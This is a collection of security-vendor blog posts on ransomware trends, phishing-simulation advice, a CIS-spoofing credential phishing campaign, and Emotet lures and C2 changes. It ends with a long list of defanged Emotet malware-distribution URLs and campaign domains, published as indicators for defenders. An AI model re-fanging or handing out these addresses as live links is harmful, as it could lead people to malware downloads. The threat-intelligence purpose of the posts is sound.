Ransomware in 2020: Not Just More, But Different

By Aaron Riley, Cofense Intelligence

Cofense IntelligenceTM assesses that enterprise-targeted ransomware campaigns will most likely increase in 2020, based on attack and ransom payment trends over the last six months. In the latter half of 2019, ransomware campaigns escalated in targeting public organizations. These attacks were frequently debilitating to an impacted organization’s ability to operate and provide services and, in some cases, resulted in a data breach.

Interestingly, victims are opting to pay the ransom more often. The cost of data recovery, reputation salvaging, and business impact often outweigh the payment itself. Further, those victims with insurance are paying at their insurer’s recommendation, often with the insurance companies covering a good deal of the cost. With enterprise ransomware campaigns becoming more lucrative for the operators, Cofense Intelligence predicts a surge this year.

In the second half of 2019, ransomware campaigns targeted different types of organizations, including schools, governments, and hospitals. Most of the victims offer public services that were disrupted or severely damaged. The Flagstaff Arizona school district suffered a ransomware attack that reportedly closed the entire school district for two days before services were recovered. Johannesburg, South Africa, was attacked in October 2019 and held hostage for $30,000—the third ransomware attack the city government suffered last year. Ransomware attacks in December 2019 targeted the Oahu Cancer Center in Hawaii and disrupted patient care, including the ability to administer radiation treatment. The victims of these attacks are finding it preferable to pay the ransom than to deal with the aftermath of data and system loss. Unfortunately, this emboldens future attacks and creates more targets.

We are now seeing ransomware campaigns that include data breaches and exfiltration. Last year, a number of victims of Maze ransomware, a few companies and one Florida city, did not immediately pay up and learned the hard way that a data breach had also ensued. Maze operators exfiltrated data in the course of their attack and released stolen documents, further extorting their victims to pay up and threatening that failure to do so would mean the release of more sensitive information. These ransomware campaigns demanded up to six million dollars in exchange for the decrypted files and used the exfiltrated data as leverage to collect payment. The Maze ransomware operators allegedly exfiltrated around 120GB of data from Southwire during another ransomware attack.

The United States federal government advises organizations not to pay a ransom, as it only encourages further attacks and there is no guarantee the captured resources will be returned in their original form. However, victims are increasingly paying the ransom, as can be seen in the latter half of 2019. These payments are typically made with a type of cryptocurrency chosen by the ransomware operators. Jackson County, Georgia paid $400,000 after a Ryuk ransomware attack majorly disrupted workflow to all county agencies, including the 911 dispatch center. Jackson County did not have cybersecurity insurance and had to pay the ransom outright, which means the citizens of the county had to subsidize the payment.

Cybersecurity insurance firms are increasingly encouraging their customers to pay the ransom, instead of rebuilding or outright losing resources that are encrypted. Ryuk ransomware impacted Lake City, Florida in late June 2019, during which authorities found that restoring the systems would exceed a million dollars compared to the $700,000 ransom. The Lake City authorities then negotiated through a third-party to pay the attackers $460,000, of which the city’s cybersecurity insurance firm reportedly funded $450,000. In this scenario, Lake City authorities were able to pay $10,000 and have their systems back up within two weeks. This proves, yet again, that targeted enterprise ransomware attacks are increasingly profitable.

With their profits rising, ransomware operators will likely increase their campaign volume in 2020. The success of ransomware campaigns may encourage the creation of additional ransomware families, requiring global organizations to evolve their cybersecurity posture. With the End of Life of Microsoft’s Windows 7, organizations that are slow in their transition to supported operating systems become more susceptible to such attacks.

We expect other trends to follow in line with our ransomware predictions for 2020. More cybersecurity firms might be utilized as a third-party negotiator for payments. Stolen data can be used in different ways—not just taken hostage—to leverage more money from the victims, especially if unsavory information is exfiltrated. More and more enterprise organizations are expected to include cybersecurity insurance within their yearly budgets. In short, it appears more companies are making business decisions that demonstrate an understanding of the likelihood of ransomware attacks. While it is good to be prepared, feeding the beast of ransomware will fuel cybercriminals looking to make big bucks.

 

HOW COFENSE CAN HELP

Every day, the Cofense Phishing Defense Center analyzes phishing emails with malware payloads that bypassed email gateways. 100% of the threats found by the Cofense PDC were identified by the end user. 0% were stopped by technology.

Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Quickly turn user reported emails into actionable intelligence with Cofense Triage. Reduce exposure time by rapidly quarantining threats with Cofense Vision.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Jeopardy GOATs Buzz In, Security World Groans

By Tonia Dudley

When Jeopardy invited its top players ever to battle it out, the winner would be crowned the Greatest of All Time (GOAT). Not the Pretty Goodest or the Gosh, Nice Try-est. And certainly not the Wow, You Very Nearly Failed-est.

But when three acclaimed geniuses hit the buzzers last week, those were the titles they earned in the cybersecurity category. The contestants missed two out of five. No big deal? Normally not, but these guys were the best of the best—and their combined score of correct answers equaled 60 percent. In most grading systems, that’s one point shy of an ‘F.’

I mean, shouldn’t a Jeopardy GOAT be good at almost everything?

Really? They missed ‘BYOD’?

Yes, they did. And it was worth $600, a pretty generous sum for a pretty easy answer.

It was exciting to see cybersecurity included in this highly watched episode. To be fair, I thought the show came up with an interesting selection of topics. Ransomware. Keylogger. Whitehats. And sigh, BYOD. Again, if this were a normal episode (or a normal game show) you’d expect easier questions. But hey, this is Jeopardy, GOAT Edition.

Here’s the dagger: current GOAT tournament leader Ken Jennings is in IT. Ken, you let us down, man! Okay, “keylogger.” Not everybody knows what it means.

But, sorry to say this, a real genius would. To claim GOAT status, you need to go beyond the basics. And not wait until the other categories are nearly exhausted before summoning the courage to tackle cybersecurity. Call me biased, but it’s a pretty important subject these days.

Kudos to the players for knowing what bitcoin is.

And for nailing HTTPS and whitehats. But millions of people watched this episode. Ken, Brad, and James could have shown America that any self-respecting GOAT knows cybersecurity as well as The Oscars or American Idols.

And couldn’t there have been one measly phishing question? “Who is John Podesta, Alex?” Or “What is a fraudulent email?” The FBI published two alerts last year on business email compromise alone.

All right, enough griping. At least our industry got some recognition. But if Jeopardy ever includes us again, I want the players to do better than a D+.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

In 2020, Resolve Not to Simulate Last Year’s Phish

By Tonia Dudley

As you start off the new year, it’s a good time to recalibrate your phishing simulation program. Things change—business objectives, mergers, acquisitions or divestitures. The threat landscape is constantly changing too and may require a complete shift in your security awareness efforts. This is why you should focus on one quarter at a time—we’d all be millionaires if we could predict the future 12 months from now.

Align Your Simulations to Phish Your Users See.

As you prepare to launch simulations this quarter, ensure you align these to the threats actually hitting your users’ inbox. By keeping your campaigns aligned, you are better preparing your users to defend your organization against a phishing incident that could lead to a data breach or ransomware attack.

How do you achieve this? Start by reaching out to your Security Operations Center (SOC), the experts on the threats facing your organization. Also, many organizations are now standing up a Cyber Threat Intelligence team to proactively hunt for threats—these analysts are another great source of anti-phishing recommendations.

Planning a Credential Phish? Attackers Probably Are.

If you don’t have access to either of these resources, check out our most recent Cofense Annual Phishing Report. For example, we continue to see phishing emails that target credentials. Whenever I visit customers or talk to security teams, I ask if they are seeing credential phishing as a major threat to their organization. Without skipping a beat, the response is typically an immediate “yes” followed up with a real phishing incident story.

Figure 1: Sample credential phish

Running a credential phishing campaign can sometimes be complex, but compared to the time spent remediating a phishing incident, it is time well spent. Chances are a credential simulation will pay off. Consider this nugget from our Annual Phishing Report:

74% of Real Phish Are Credential Phish

But Credential Phish Are Only 17.2% of Simulations

That’s a gap in your phishing awareness program you don’t want to see.

Don’t Forget Tax Season, Plus Data Privacy and Valentine’s Days.

Beyond credential threats, the first quarter of the calendar year offers seasonal themes. I’ve seen some awareness programs use a topics calendar, and the following topics are good bets for the first few months of the year.

  • Data Privacy Day – January 28th.
  • Tax season – anything related to tax topics and W2’s pique interest.
  • Valentine’s Day
    • I know some of you are right now thinking about that Valentine’s e-Card you want to send out. We recently covered holiday themed campaigns used by the Emotet botnet in our December blog post. If Emotet comes back online, we’ll most likely see them leverage a similar holiday theme again. If you want to align a Valentine’s theme to a real threat, focus on an attachment that leverages a macro enabled MS Word document. Speaking of Emotet, because it’s one of the biggest botnets out there, Cofense led off our new podcast series, Phish Fryday, with an Emotet deep-dive. Check it out here.

Whatever topics or themes you choose, just be sure they reflect the email threats your users will likely see. Whether your program is mature (and needs a jolt) or you’re just getting started, good luck! The Cofense resources below can help you move from awareness to full-strength phishing defense.

HOW COFENSE CAN HELP

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review

Every day, the Cofense Phishing Defense Center analyzes phishing emails with malware payloads that bypassed email gateways. 100% of the threats found by the Cofense PDC were identified by the end user. 0% were stopped by technology.

Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Quickly turn user reported emails into actionable intelligence with Cofense Triage. Reduce exposure time by rapidly quarantining threats with Cofense Vision.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Organization of Post-Soviet States Spoofed in Phishing Email

By Julie Hall and Dylan Duncan,

Cofense IntelligenceTM has detected a Russian language credential phishing campaign, spoofing a well-known financial organization, that delivers a malicious PDF to end users. The phishing campaign spoofs the Commonwealth of Independent States (CIS), a legitimate post-Soviet nations organization portal, and claims to offer ruble compensation. The is delivered with a blank phishing email containing a PDF file that includes a redirect link to a Russian language phishing site. Cofense has observed the phish making its way through Microsoft’s EOP Secure Email Gateway and it may have bypassed others.

Notably, all domains that Cofense Intelligence has recorded in this campaign contain valid certificates and were recently registered between November 19th and December 1st, 2019. Figure 1 presents the phishing email that contains no context, just a PDF attachment.

Figure 1: Phishing Email

Using a simplistic and blank email generally results in only curious, unsuspecting recipients being automatically directed to the phishing portal. However, in this phishing scenario, once the PDF is opened, the recipient is presented with an image and a link, as shown in Figure 2.

Figure 2: PDF File

Clicking the hyperlink, which requests the end user to review a document, redirects to a phishing site, as shown in Figure 3. The phishing attack consists of multiple steps. The spoofed financial service claims to offer eligible citizens monetary compensation; however, they are only given a limited time frame to register their claim. To claim the compensation, visitors must submit a bank card number and a Voila (cryptocurrency token). After providing the information, users are prompted to pay a randomly generated fee before receiving the compensation.

Figure 3: Landing Page of Phishing Attack

As a false sense of authenticity, every 30 to 60 seconds the site generates one of 10 pop-ups claiming that a user has received compensation (see Figure 4). Also, the site accepts all inputs and does not conduct any validation; therefore, all visitors are at risk of navigating their way through all of the steps. This combination of techniques—the limited time frame, spoofing of a legitimate organization, a large compensation offer, and the registered domains with valid certifications—create a sense of legitimacy and builds excitement and urgency for recipients. These Tactics, Techniques, and Procedures (TTPs) cloud judgment and lower the victim’s guard.

Figure 4: Received Compensation Pop-Up

The domains contain an open directory with an accessible phishing kit, FKG.zip. The kit contains multiple HTML, JavaScript, and JavaScript Object Notation files. The .html files link to the web pages of the phishing attack while the JS and JSON files control the functionality of the phish.

In the file upssels.js, the domain clickpay24[.]tv is used as an API to accept the direct payments from the users. After completing each step of the phish, recipients are redirected to a payment site generated by clickpay24. The generated URLs follow the path az-payout.com[.]com/buy/<16 Integers> with random integers.

Preventing certain email-borne intrusions involves security awareness as the first line of defense. Alongside automated anti-phishing tools, educating company personnel on new phishing trends is the best way of countering a campaign such as this.

Table 1: Domains associated with the campaign

Domain Registration Date
h-formpay-a[.]top November 19, 2019
x-a[.]top December 1, 2019
Luckyclick[.]best November 24, 2019
m-f1[.]top December 1, 2019
c3p-cl[.]club November 29, 2019
o-k-f.aadfk[.]top November 28, 2019
m-go[.]top November 11, 2019

 

Every day, the Cofense Phishing Defense Center analyzes phishing emails that bypassed email gateways. 100% of the threats found by the Cofense PDC were identified by the end user. 0% were stopped by technology.

Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Quickly turn user reported emails into actionable intelligence with Cofense Triage. Reduce exposure time by rapidly quarantining threats with Cofense Vision.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 34008.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Want to simulate a holiday phish? This one’s from your friends at Emotet.

By Tonia Dudley

Tis the season when organizations are looking to send out the year’s last phishing simulation. Often the Security Awareness team lands on a holiday theme – holiday party, holiday raffle, or even the fun ugly sweater lure.

In the past, when I worked with teams to advance their phishing defense programs, I would recommend staying away from holiday themed scenarios. I’ll explain why in a moment. But my opinion has changed, thanks to the threat actors behind Emotet.

We first saw Emotet using a holiday theme in late October as Halloween approached. This was an interesting shift, as not only did it include a macro enabled MS Word attachment, but it was one that they had created. Many of the templates they used came from scrapped inboxes to leverage real email conversations. Fast forward to the year-end holiday season when organizations host parties to celebrate. Our Cofense LabsTM team closely monitors the Emotet botnet, and thus we began seeing the holiday theme hit the wire. Within a few days, we also saw the additional language translations. Ah! They enlist translators!

Figure 1: Emotet Holiday Themed Email

When you look at the email in Figure 1, it’s not pretty or well formatted – unlike the templates used in simulation campaigns. What else do you notice about this attachment? Does your organization still use .doc for MS Word? Not likely. I can imagine if you’re required to get management approval for your campaigns, you would be told to go back to the drawing board and get more creative.

However, if your phishing defense program is aligned with active threats hitting organizations, then this is exactly the template you should be using to train your users to identify a real phish. We don’t do justice for our organizations when we craft really fancy templates that don’t align to what threat actors are sending to your users’ inbox. When we took a look at one of our fancy social media invites, the susceptibility rate was around 7%.

However, when we looked at a template that modeled a real active threat, the susceptibility rate is almost 52%.

Figure 2: Examples of Simulated Holiday Phish

During the month of December, Cofense sees an uptick in requests from customers to create “custom” holiday phishing simulations. Again, these are typically fancy made up emails that mimic an eCard (and are blocked by most Secure Email Gateways), the type of email we don’t see hitting our active threats queue when we’re monitoring real phish in the wild.

Until now. So by all means, go ahead and simulate a holiday phish. Just remember to keep it real.

 

HOW COFENSE CAN HELP

100% of malware-bearing phishing threats analyzed by the Cofense Phishing Defense Center were reported by end users and bypassed technical controls that were in place to protect them.

Cofense PhishMe offers a simulation template, “Christmas Party – Emotet,” to educate users on the phishing tactic described in this blog. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Quickly turn user reported emails into actionable intelligence with Cofense Triage. Reduce exposure time by rapidly quarantining threats with Cofense Vision.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 34972.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

5 Cybersecurity Trends that Will Dominate 2020

By Aaron Higbee, CTO, Cofense

The threat landscape continues to evolve at a rapid pace, with new threat vectors emerging and increasing in sophistication. Which ones should you watch most closely as 2020 unfolds? Based on insights collected from our Cofense research teams, here are five trends we see dominating next year.

Ransomware will continue becoming more targeted to reap more sizeable payouts.

Many people are under the impression that ransomware is slowing down, but in reality it’s simply being used in a more targeted fashion. So many private and public organizations, as well as government entities, have been infiltrated by ransomware that we’ve become desensitized to its devastating effects.

Ransomware is very much alive, and more sophisticated actors are using it every day as a gateway into an organization’s network, once they identify crown jewels left vulnerable. One of the reasons why we’re not hearing as much about ransomware in the media is that attacks are increasingly difficult to cover. Due to cyber liability insurance policies and law enforcement involvement creating so much red tape, the real information is shrouded in secrecy and not making it into the public domain. Threat actors will continue to refine their targeting in 2020 in order to maximize their profits with organizations that don’t have an advanced security posture but do have a lot to lose.

Healthcare and genetic testing organizations will be a rich target for monetizing data.  

Healthcare organizations will always be one of the richest targets for ransomware and consumer fraud, as they provide easy access to valuable information, such as social security numbers, that can be monetized quickly. But as we look to the future, the prospect of malicious actors hacking into a database of a genetic testing company is especially disturbing. Not only would a threat actor have a detailed record of medical history and family heritage, but if the ethics of gene editing evolve further—and it’s not far off—a master log of thousands, if not millions, of peoples’ DNA is potentially available for attackers to exploit.

Cryptocurrency will find itself in the crosshairs.

The cryptocurrency industry is not widely understood, but it is on the receiving end of some of the most advanced attack methods we’ve seen to-date. Whether it’s a high-profile crypto holder or an entire cryptocurrency exchange, we’ve seen first-hand at Cofense how this realm of cyberspace is impacted by elite phishing tactics. Ultimately, the hackers look at their targets from two angles.

The first, if you’re a sole cryptocurrency holder: is your line of defense weak enough for me to hack you, log into your exchange, steal your cryptocurrency, and transfer it out? The second: is one of your employees, and it only takes one, susceptible to clicking on a phishing link so I can hack into your entire network and dig deep enough to access the cold storage vaults and pull off a heist?

The latter is far more likely, as organizations often neglect to train their employees to identify malicious emails. They mistakenly believe that more expensive, “we-promise-to-stop-it-all” technologies will thwart every attack. The reality is that the circle of trust at some organizations is so large that their employees are really the first and last line of defense against an attack.

SIM-jacking will be used to jack cryptocrurrency.

SIM-jacking is a trend that has recently emerged and will pick up speed in 2020, due to its success and the ease of implementation. Instead of wasting time trying to infiltrate the source, SIM hijackers will go to someone who works for a telecom company and pay them off to assign your phone number to another device and then use that phone number to reset your passwords and steal your cryptocurrency. In fact, one major U.S. telecom company is currently in the throes of a lawsuit following a handful of employees who helped hackers rob a customer of $1.8 million worth of cryptocurrency. It is heavily debated who exactly is at fault for SIM-jacking attacks, and while cybercriminals are obviously at fault, there are several layers to the attack that blur the lines.

Information warfare will put human intuition to the test.

In an era of fake news, information warfare is a very real consequence of social media platforms and an influx of news outlets. The public has to rely on, and decipher between, numerous news sources that offer little evidence, and much to the imagination, when it comes to the root cause of most stories.

Evidence is the key to validating any story. At Cofense, we stress the importance of conditioning people to recognize fake from real—phishing emails and other scams that target employees at work and home.

Human intuition is one of the most powerful tools in your arsenal, and it’s vital to hone it as a natural defense mechanism to combat against all types of threats, whether it’s fake news, a conspiracy theory, or a scam designed to bilk your company of its data, funds, or brand reputation.

To stay on top of phishing and malware threats in 2020, be sure to check this blog. We’ll continue to share our teams’ findings, both what we see in the wild and what evades the email gateway.

 

HOW COFENSE CAN HELP

100% of malware-bearing phishing threats analyzed by the Cofense Phishing Defense Center were reported by end users. 0% were stopped by technology. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Quickly turn user reported emails into actionable intelligence with Cofense Triage. Reduce exposure time by rapidly quarantining threats with Cofense Vision.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence.

 

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Emotet Modifies Command & Control URI Structure and Brings Back Link-based Emails

By Noah Mizell, Cofense Phishing Defense Center

Emotet has been busy wrapping up the year with some minor tweaks to their client code and the reintroduction of some tactics that have worked well for them in the past. The botnet that began its life as a banking trojan in 2014 has proven to be a formidable threat to organizations around the world and shows no signs of stopping. Before we look at their recent changes, let’s begin with a quick review of some of the notable updates we have observed this year:

  • January 13, 2019 – The Emotet botnet reemerges from vacation to begin its first campaign of the year.
  • January 28, 2019 – Experimentation with Qakbot as a payload.
  • March 14, 2019 – The client code is changed to utilize a wordlist to generate random paths when checking into the Command & Control (C2) and now uses the POST method instead of GET. The use of JavaScript attachments is noted as well.
  • April 9, 2019 – The botnet operators begin using the emails that were stolen starting in the last part of their 2018 campaign. The use of stolen content provides the ability to create spear-phishing like emails on a scale never seen before.
  • May 31, 2019 – Emotet goes on summer vacation shutting down a large part of its infrastructure.
  • Sep 3, 2019 – C2 begins to come back online.
  • Sep 16, 2019 – Spamming operations resume. Link and PDF attachment based emails are very limited. The vast majority of their campaigns are macro document-based. Heavy use of the reply-chain (stolen email) tactic is observed.
  • Large deployments of TrickBot and Dreambot are used as secondary infections throughout the year.
  • The term “Triple Threat” is created to note the high incidence of Emotet -> TrickBot -> Ryuk infections seen in the wild, leading to massive ransomware payments and a great deal of lost time and money for many government and private organizations.

Starting on November 27th, we noticed a change in the way the Emotet client code was checking into the C2 servers. Gone are the random paths utilizing the word list (figure 1) that was seen in the past.

Figure 1: URI structure introduced in early 2019

Figure 2: The new URI structure seen as of Nov. 27

The clients are now adding a path that, at first glance, appears to be a random string with a minimum length of four characters.  A slightly deeper investigation into this traffic shows the path is actually the key from the key/value pair in the posted form data.  This change is odd, as it does not actually alter the check-in data in any meaningful way and appears instead to be more cosmetic in nature. This leads us to believe that it may have been a rudimentary attempt at identifying researchers who are running emulation code alone, as their check-in structure would not have dynamically changed when the code base was updated.

Figure 3: Example Emotet delivery email

Another noted change was the reintroduction of link-based email templates. We have seen Emotet emails use links with great success in the past. For unknown reasons, the threat actors did not seem to use them when coming back from summer vacation. In all likelihood, they are using them now to maximize their victim count before breaking again for the winter holidays.

We have included a listing of some of the URLs seen on the first day back further below.  Heavy distribution of TrickBot has also been seen in recent campaigns as a secondary infection and may be a money grab to fund their holidays.

Figure 4: Example Emotet delivery email

As with past campaigns, we have also seen an uptick in the use of shipping company themed emails to coincide with the holiday season, a recurring theme for the actors around this time of year. One change to the email templates that appears to be a new lure is an “Open Enrollment 2020” theme to entice users who have not yet decided on their insurance program for the upcoming calendar year.

The Emotet actors are masters at creating email templates that exploit a user’s emotional response, and this is a prime example.

Cofense’s research teams – Cofense Labs, Cofense Intelligence and the Cofense Phishing Defense Center – actively monitor the Emotet botnet to identify phishing threats that may impact customers and to provide security operations with the latest campaign data.

 

HOW COFENSE CAN HELP

100% of malware-bearing phishing threats analyzed by the Cofense Phishing Defense Center are reported by end users and bypassed technical controls that were in place to protect them.

Cofense PhishMe offers a simulation template, “Order Confirmation – Emotet/Geodo,” to educate users on the phishing tactic described in this blog. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe and remove the blind spot with Cofense Reporter.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 34580.

Quickly turn user reported emails into actionable intelligence with Cofense Triage and reduce exposure time by rapidly quarantining threats with Cofense Vision.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

hXXp://3mbapparel[.]com/ce8p4mw/Scan/23sr2r3h-227136449-4100-o7f3aukln-5ek9w7yx/

hXXp://abbasghanbari[.]com/cgi-bin/m2gx-j9l-2674/

hXXp://abis[.]abis-dom[.]ru/wp-content/multifunctional-zone/external-portal/XKnI9c95VXtO-2koeL1odjG8e45/

hXXp://adrianoogushi[.]com[.]br/blogs/available-resource/test-forum/CO37HIcUG-4KiqqruHlj9/

hXXp://agramarket[.]com/wp-admin/554841538461/9igxpru22w-3404-624501945-dtenc-cvona7/

hXXp://agramarket[.]com/wp-admin/images/Document/

hXXp://aijiuli[.]com/wp-content/common-3644746801311-F61eGi6VrRfSERpV/guarded-722116w-9jx99j5uyog/2b51q65tivz3f97-3vw70xy142675/

hXXp://alfaem[.]by/wp-includes/wcevu12a6j/ui13miem-1842496-647941-b1maguvyl7-0wm1/

hXXp://allgamers[.]ir/wp-content/6270900376591-TrHEgUBtm-sector/verified-portal/3rw-x42z0/

hXXp://aminulnakla[.]com/test/5mpub-u9jdh-1356/

hXXp://amoutleather[.]com/a/multifunctional_9313571_Y9mwVe/additional_forum/EAvHHxYA2_z07m8sM36w72/

hXXp://anantasquare[.]com/wp-content/Documentation/1yzenuu55v/zdx0oqd5mp-79785-92241-lqk84aode-i65yma2m1/

hXXp://andishkademedia[.]com/wp-includes/8vcppv-4l1-885316/

hXXp://anhjenda[.]net/wp-content/vmpyh5c3pi/

hXXp://anjumpackages[.]com/nrri/private_44709616882_WQZDa1KAyj/corporate_V6tkmPmj_jRcx2PfQ/on3_1v7649ys6t1/

hXXp://aquimero[.]net/wp-includes/8gdm6-y4kj-461/

hXXp://archinnovatedesigns[.]com/wp-includes/464728-V0rjOQkXZi4SSiW-disk/580333-3VP9JZcfWI6-cloud/028eeth-vu553tyw/

hXXp://arielcarter[.]com/j7foqo2/DOC/iqrh6hczo0cw/

hXXp://arttoliveby[.]com/yyrye/private_86192_eZoBMjbfcDvuPq/test_cloud/ws3uh67ha1tup_5128t108/

hXXp://auliskicamp[.]in/wp-admin/common_resource/verified_vZUVdO8ppY_CWfMSl2yMCEH/bgJEju1jvH_3iNK6o4Ii4G/

hXXp://awooddashacabka[.]com/yt46/open-box/individual-area/yNmy5HQif-8o8tG738h2/

hXXp://babdigital[.]com[.]br/wp-content/esp/6v5nej75l/

hXXp://bakeacake[.]com/wp-admin/available-disk/security-warehouse/z1XGaZ-NemjMNrc3a/

hXXp://bassigarments[.]com/wp-content/personal-592742204-WBrGGz/4469690-7SOBhN7gbB7s-area/b90h417-wtxsw/

hXXp://batdongsanhathanh[.]net/wp-admin/open-resource/568A8V-ILYyxINK-profile/jdux7bsdp-twyu179678t1/

hXXp://beiramarsushi[.]com[.]br/1g3ld9f/closed_n941_aUn1fAfrvX8Bhu/test_warehouse/6N1JhlV_M8oi1aM9Gyw/

hXXp://best-fences[.]ru/css/4ey-6v7y0-5856/

hXXp://betaoptimexfreze[.]com/bebkat/Reporting/9zooeodt/x827ofzp-289202990-87262-q99cri9-xr06/

hXXp://bgctexas[.]com/quietnightcompany/xb1k2g9/personal_zone/test_WlYEqat2Ie_OgiyQ9W40qCyP/bw54a4lhlrx_9636w4uu0xsxt1/

hXXp://bilgigazetesi[.]net/a6lwm1m/open_sector/special_forum/Ej4oMEQf3AN_Gudt5tx97J/

hXXp://bimattien[.]com/wp-admin/eTrac/ld6u234c3/ga438o-5744266-474284-eejhd-5ctewz/

hXXp://blicher[.]info/wp-includes/KPrV/

hXXp://blog[.]inkentikaburlu[.]com/70jjm53klo/sites/2yd7bvuh-505209-64670737-fr4vs-t7zp3cjl0/

hXXp://blog[.]sawanadruki[.]pl/wp-content/uilb8dz6_hwpeyvx_sector/security_warehouse/0gKrzfjYpvFO_3yLM891Meliz/

hXXp://blogkolorsillas[.]kolorsillas[.]com/wordpress/xnq1k-rkkl-803/

hXXp://bluemedgroup[.]com/wp-admin/mnfd8_nbij_436575782_UQEO1IVCs4LqadTV/security_profile/XODmvThQGR7_H7vrzccMec5/

hXXp://bmrvengineering[.]com/wp-admin/FILE/

hXXp://bookitcarrental[.]com/wordpress/INC/iddp2ggtm/eccvup8c-3843-818470-69yg4b28wh-w1kxriyo/

hXXp://bupaari[.]com[.]pk/RoyalAdventureClub[.]com/eTrac/ncevpoamvlp0/

hXXp://buyrealdocumentonline[.]com/wp/Documentation/d7mz-688402499-7314933257-fkwggnu-t4ybrvaf7/

hXXp://cabosanlorenzo[.]com/wp-load/protected-resource/verifiable-tk2c-3kfk3g9iz/ebub24rmzo8-9u88717yx935/

hXXp://cacimbanoronha[.]com[.]br/wp-content/Scan/

hXXp://caotruongthanh[.]com/wp-admin/qeku-4ys4-83891/

hXXp://carolscloud[.]com/media/public/

hXXp://carolzerbini[.]com[.]br/6ttp7t0/Overview/qoawf12j0jbp/

hXXp://carvalhopagnoncelli[.]com[.]br/lvqhz/Overview/0rrnguk8z/lg4qyh7-338411-43458560-pp7dts1ba-3msz/

hXXp://cas[.]biscast[.]edu[.]ph/updates/personal_sector/verifiable_warehouse/D3buvGg_1yyMJGrM6gp/

hXXp://casaquintaletcetal[.]com[.]br/e6viur/04383245_xZw1ZKxX_41063_29gQlRhcVl5eGs/additional_area/4004h_s035tt6461/

hXXp://casinovegas[.]in/cgi-bin/protected_module/additional_warehouse/NzQU7EbxmY_mLobpJqHn8Lh8/

hXXp://catchraccoons[.]com/wp-admin/open_9135304_x3VG052S9vjEZN/external_warehouse/AgnasV_o0M4JIrNt67j/

hXXp://caughtonthestreet[.]com/sh5bne/available_sector/test_mhc3xk01u_if5a3isqhztj4/fwpqcd9admvnur_yuu17s15/

hXXp://cetpro[.]harvar[.]edu[.]pe/dup-installer/2i5i_r76gl3x5v6vge_disk/individual_profile/NrWPp5_3Hj0zszymw/

hXXp://championretrievers[.]com/wp-admin/paclm/mdjx-81327-4043-zujiz-uoi7hp59w4/

hXXp://charger-battery[.]co[.]uk/chargerimages/Reporting/

hXXp://chatnwax[.]com/dir/RRETX2MC9ZE7/syc01o4x/

hXXp://cheappigeontraps[.]com/wp-admin/personal-resource/guarded-gueidxaiga-544/a4hko1sshe-6530yx62/

hXXp://cheapraccoontraps[.]com/wp-admin/parts_service/zn6iszxroew/0vqf-97169-6342681145-z9iyge-xws5/

hXXp://cherrypointanimalhospital[.]com/new/parts_service/po53iyxo22m/

hXXp://chintamuktwelfare[.]com/wuvke31kdk/open-array/open-space/j2hg7S-Mseglc5d/

hXXp://chongthamhoanglinh[.]com/cgi-bin/Reporting/

hXXp://chooseyourtable[.]sapian[.]co[.]in/wp-includes/x3qc-azmz9-340871/

